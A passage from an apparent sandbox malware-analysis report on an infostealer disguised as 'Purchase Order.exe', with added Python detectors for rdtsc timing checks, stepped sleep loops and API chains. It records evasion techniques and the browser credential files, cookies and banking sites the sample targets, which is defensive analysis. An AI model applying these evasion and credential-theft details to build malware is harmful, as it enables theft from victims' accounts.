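        raise ValueError("not a Code function entry")
    apis = [a for a in m.group(2).split(",") if a]   # drop the trailing empty field
    return m.group(1), apis


def normalize(api: str) -> str:
    """Fold ANSI/Unicode suffixes: LookupPrivilegeValueA -> LookupPrivilegeValue.
    Only strips a trailing A/W that follows a lowercase letter or digit, so
    names like ExitWindowsEx or the ordinal import '#17' are left alone."""
    if len(api) > 2 and api[-1] in "AW" and (api[-2].islower() or api[-2].isdigit()):
        return api[:-1]
    return api


def contains_ordered(apis: List[str], chain: List[str]) -> bool:
    """True if every API in `chain` occurs in `apis` in that order (gaps allowed)."""
    pos = 0
    for api in map(normalize, apis):
        if api == chain[pos]:
            pos += 1
            if pos == len(chain):
                return True
    return False


def match_chains(line: str) -> Tuple[str, List[str]]:
    """Return (function id, [names of chains the entry contains])."""
    func, apis = parse_entry(line)
    return func, [name for name, chain in CHAINS.items() if contains_ordered(apis, chain)]


if __name__ == "__main__":
    for line in REPORT_LINES:
        print(match_chains(line))
```

Matching is order-sensitive on purpose: an entry that lists ExitWindowsEx before OpenProcessToken does not satisfy the first rule, which keeps the matcher honest on chains where the sequence is the evidence.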
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (identical entry repeated 66 times in the report)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Purchase Order.exe API/Special instruction interceptor: Address: 659F591
Source: C:\Users\user\Desktop\Purchase Order.exe API/Special instruction interceptor: Address: 27EF591
Source: C:\Users\user\Desktop\Purchase Order.exe RDTSC instruction interceptor: First address: 653E3D2 second address: 653E3D2 instructions:
    0x00000000 rdtsc
    0x00000002 test ah, ch
    0x00000004 cmp ebx, ecx
    0x00000006 jc 00007FA27052805Fh
    0x00000008 cmp cx, 58E6h
    0x0000000d inc ebp
    0x0000000e test bh, ah
    0x00000010 inc ebx
    0x00000011 test bl, bl
    0x00000013 rdtsc
Source: C:\Users\user\Desktop\Purchase Order.exe RDTSC instruction interceptor: First address: 278E3D2 second address: 278E3D2 instructions:
    0x00000000 rdtsc
    0x00000002 test ah, ch
    0x00000004 cmp ebx, ecx
    0x00000006 jc 00007FA270755D7Fh
    0x00000008 cmp cx, 58E6h
    0x0000000d inc ebp
    0x0000000e test bh, ah
    0x00000010 inc ebx
    0x00000011 test bl, bl
    0x00000013 rdtsc
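Both interceptor entries show the same window: an rdtsc, eight cheap ALU instructions (test, cmp, inc and one conditional jump), then a second rdtsc. The code that consumes the two counter values lies outside the captured window, but two rdtsc reads with nothing between them that could legitimately take time is the classic shape of a timing check against a hypervisor or a single-stepping debugger, and the identical first and second addresses suggest the interceptor hit the same rdtsc site twice, i.e. the check runs in a loop. The Python below is an added example for this page, not part of the report and not Joe Sandbox code: it parses a listing in the format above and applies an "rdtsc pair" heuristic, flagging two reads at most 16 instructions apart with no call, int, syscall or ret between them. The listing is a constructed copy of the 653E3D2 entry; the benign listing, the gap limit and the function names are the editor's.

```python
import re
from typing import List, Tuple

# Constructed copy of the report's interceptor listing for the rdtsc site at
# 653E3D2 (offsets are relative to the first rdtsc, immediates carry an 'h').
REPORT_LISTING = (
    "0x00000000 rdtsc 0x00000002 test ah, ch 0x00000004 cmp ebx, ecx "
    "0x00000006 jc 00007FA27052805Fh 0x00000008 cmp cx, 58E6h 0x0000000d inc ebp "
    "0x0000000e test bh, ah 0x00000010 inc ebx 0x00000011 test bl, bl 0x00000013 rdtsc"
)

# Constructed counter-example: rdtsc around a call is ordinary profiling code
# and must not be flagged.
BENIGN_LISTING = (
    "0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 call 00401000h "
    "0x00000009 rdtsc 0x0000000b sub eax, esi"
)

# One instruction = 8-hex-digit offset, then text up to the next offset or the
# end of the listing. Works whether the listing is on one line or many.
_INSN = re.compile(r"0x([0-9a-fA-F]{8})\s+(.+?)(?=\s+0x[0-9a-fA-F]{8}\s|\s*$)", re.S)

# Anything in the gap that legitimately costs time or leaves the function.
CONTROL_TRANSFER = {"call", "syscall", "sysenter", "int", "ret", "retn"}

Insn = Tuple[int, str, str]  # (offset, mnemonic, operands)


def parse_listing(text: str) -> List[Insn]:
    """Turn an interceptor listing into (offset, mnemonic, operands) tuples."""
    insns: List[Insn] = []
    for off, body in _INSN.findall(text):
        parts = body.strip().split(None, 1)
        operands = parts[1].strip() if len(parts) > 1 else ""
        insns.append((int(off, 16), parts[0].lower(), operands))
    return insns


def find_rdtsc_pairs(insns: List[Insn], max_gap: int = 16) -> List[Tuple[int, int, int]]:
    """Return (first_offset, second_offset, instructions_between) for each
    consecutive pair of rdtsc reads that are close together and have no
    call/int/syscall/ret between them: the shape of a VM/debugger timing check."""
    idx = [i for i, (_, m, _) in enumerate(insns) if m == "rdtsc"]
    pairs: List[Tuple[int, int, int]] = []
    for a, b in zip(idx, idx[1:]):
        gap = insns[a + 1:b]
        if len(gap) <= max_gap and not any(m in CONTROL_TRANSFER for _, m, _ in gap):
            pairs.append((insns[a][0], insns[b][0], len(gap)))
    return pairs


def is_timing_check(text: str) -> bool:
    """Convenience wrapper: does the listing contain at least one suspicious pair?"""
    return bool(find_rdtsc_pairs(parse_listing(text)))


if __name__ == "__main__":
    print(find_rdtsc_pairs(parse_listing(REPORT_LISTING)))   # [(0, 19, 8)]
    print(is_timing_check(BENIGN_LISTING))                    # False
```

The heuristic deliberately ignores what happens to the two counter values; a delta-and-compare usually follows a few instructions later, but the interceptor window above does not show it, so the rule keys only on what is visible.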
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 110000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 36830000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 38830000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay times: 922337203685477, 600000, 599875, 599766, 599657, 599532, 599421, 599313, 599188, 599063, 598938, 598813, 598703, 598594, 598469, 598344, 598235, 598125, 598016, 597891, 597766, 597657, 597532, 597407, 597297, 597188, 597063, 596938, 596813, 596688, 596578, 596469, 596344, 596235, 596110, 595985, 595860, 595735, 595610, 595485, 595365, 595235, 595110, 594985, 594860, 594735, 594610, 594485, 594360, 594235, 594110
Source: C:\Users\user\Desktop\Purchase Order.exe Window / User API: threadDelayed 2128
Source: C:\Users\user\Desktop\Purchase Order.exe Window / User API: threadDelayed 7691
Source: C:\Users\user\Desktop\Purchase Order.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll
Source: C:\Users\user\Desktop\Purchase Order.exe API coverage: 1.5 %
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep count: 41 > 30
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592 Thread sleep count: 2128 > 30
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592 Thread sleep count: 7691 > 30
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep times (each flagged against the -30000s threshold): -37815825351104557s, -600000s, -599875s, -599766s, -599657s, -599532s, -599421s, -599313s, -599188s, -599063s, -598938s, -598813s, -598703s, -598594s, -598469s, -598344s, -598235s, -598125s, -598016s, -597891s, -597766s, -597657s, -597532s, -597407s, -597297s, -597188s, -597063s, -596938s, -596813s, -596688s, -596578s, -596469s, -596344s, -596235s, -596110s, -595985s, -595860s, -595735s, -595610s, -595485s, -595365s, -595235s, -595110s, -594985s, -594860s, -594735s, -594610s, -594485s, -594360s, -594235s, -594110s
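The sleep and RDTSC entries above are raw observations. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in this report's format and reduces them to the evasion verdicts an analyst actually wants from them (an effectively infinite sleep, a sleep above the report's own 3-minute threshold, a countdown loop of steadily shrinking sleeps, a thread hammering the sleep API, and a stub that reads RDTSC twice to time itself). The embedded sample lines are constructed from a handful of the entries above, and the constants (the 1..1000 ms step window, the 1000-sleep hammering count), the assumption that delay values are milliseconds, and the reading of 922337203685477 as the largest NT relative delay (0x7FFFFFFFFFFFFFFF units of 100 ns) in milliseconds are the example's own choices; the report only lists the numbers and leaves the "s" suffix on the negative sleep times as the tool prints it.

```python
import re

# Largest positive relative NT delay (0x7FFFFFFFFFFFFFFF units of 100 ns) in
# milliseconds. It equals the 922337203685477 value listed in the report, which
# is why that entry is read here as "sleep effectively forever" (an inference
# from the arithmetic, not something the report states).
NT_MAX_DELAY_MS = 0x7FFFFFFFFFFFFFFF // 10_000
LONG_SLEEP_MS = 3 * 60 * 1_000        # the report's own ">= 3 min" long-sleep threshold
STEP_MIN_MS, STEP_MAX_MS = 1, 1_000   # per-iteration shrink expected of a countdown loop (assumption)
HAMMER_COUNT = 1_000                  # sleeps per thread that no benign installer needs (assumption)

DELAY_RE = re.compile(r"Thread delayed: delay times?: (\d[\d, ]*)")
SLEEP_COUNT_RE = re.compile(r"TID: (\d+) Thread sleep count: (\d+) > \d+")
RDTSC_RE = re.compile(
    r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
    r"second address: ([0-9A-Fa-f]+) instructions: (.*)$"
)

# Constructed sample in the shape of the report lines (a few representative
# entries, not the full list), so the script runs offline.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Purchase Order.exe RDTSC instruction interceptor: First address: 653E3D2 second address: 653E3D2 instructions: 0x00000000 rdtsc 0x00000002 test ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA27052805Fh 0x00000008 cmp cx, 58E6h 0x0000000d inc ebp 0x0000000e test bh, ah 0x00000010 inc ebx 0x00000011 test bl, bl 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592 Thread sleep count: 2128 > 30 Jump to behavior
""".strip().splitlines()


def parse_report(lines):
    """Extract delay values, per-thread sleep counts and RDTSC stubs from report lines."""
    delays, sleep_counts, rdtsc = [], {}, []
    for line in lines:
        if m := DELAY_RE.search(line):
            # Accepts both one value per line and a comma-separated list of values.
            delays.extend(int(v) for v in m.group(1).split(",") if v.strip())
        elif m := SLEEP_COUNT_RE.search(line):
            tid, count = int(m.group(1)), int(m.group(2))
            sleep_counts[tid] = max(sleep_counts.get(tid, 0), count)
        elif m := RDTSC_RE.search(line):
            # Two RDTSC reads in one stub means the code is timing itself, the
            # classic "am I running under a hypervisor or emulator?" check.
            reads = len(re.findall(r"\brdtsc\b", m.group(3)))
            rdtsc.append({"first": m.group(1), "second": m.group(2), "reads": reads})
    return {"delays": delays, "sleep_counts": sleep_counts, "rdtsc": rdtsc}


def _countdown_run(values, min_run=3):
    """True if at least `min_run` consecutive deltas shrink by a small, steady step."""
    run = 0
    for prev, cur in zip(values, values[1:]):
        if STEP_MIN_MS <= prev - cur <= STEP_MAX_MS:
            run += 1
            if run >= min_run:
                return True
        else:
            run = 0
    return False


def analyze(parsed):
    """Turn parsed observations into named evasion verdicts."""
    finite = [d for d in parsed["delays"] if d < NT_MAX_DELAY_MS]
    max_count = max(parsed["sleep_counts"].values(), default=0)
    return {
        "infinite_sleep": any(d >= NT_MAX_DELAY_MS for d in parsed["delays"]),
        "long_sleep": any(d >= LONG_SLEEP_MS for d in finite),
        "stepped_sleep_loop": _countdown_run(finite),
        "total_finite_sleep_ms": sum(finite),
        "max_sleep_count": max_count,
        "sleep_hammering": max_count >= HAMMER_COUNT,
        "rdtsc_timing_check": any(r["reads"] >= 2 for r in parsed["rdtsc"]),
    }


if __name__ == "__main__":
    for key, value in analyze(parse_report(SAMPLE_LINES)).items():
        print(f"{key}: {value}")
```

The countdown check is the useful one: a single 10-minute sleep is what a sandbox's sleep-skipping handles, but a loop that re-issues the sleep with a slightly smaller value each iteration (600000, 599875, 599766, ...) defeats naive "fast-forward the clock" patches unless the sandbox also reports the accumulated delay, which is what the per-thread counts above make visible.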
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004061FB FindFirstFileA,FindClose, 0_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0040270B FindFirstFileA, 4_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004061FB FindFirstFileA,FindClose, 4_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006318000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW81
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Purchase Order.exe, 00000004.00000002.3385180185.00000000378BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Purchase Order.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\Purchase Order.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00405F19 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405F19
Source: C:\Users\user\Desktop\Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase Order.exe PID: 3340, type: MEMORYSTR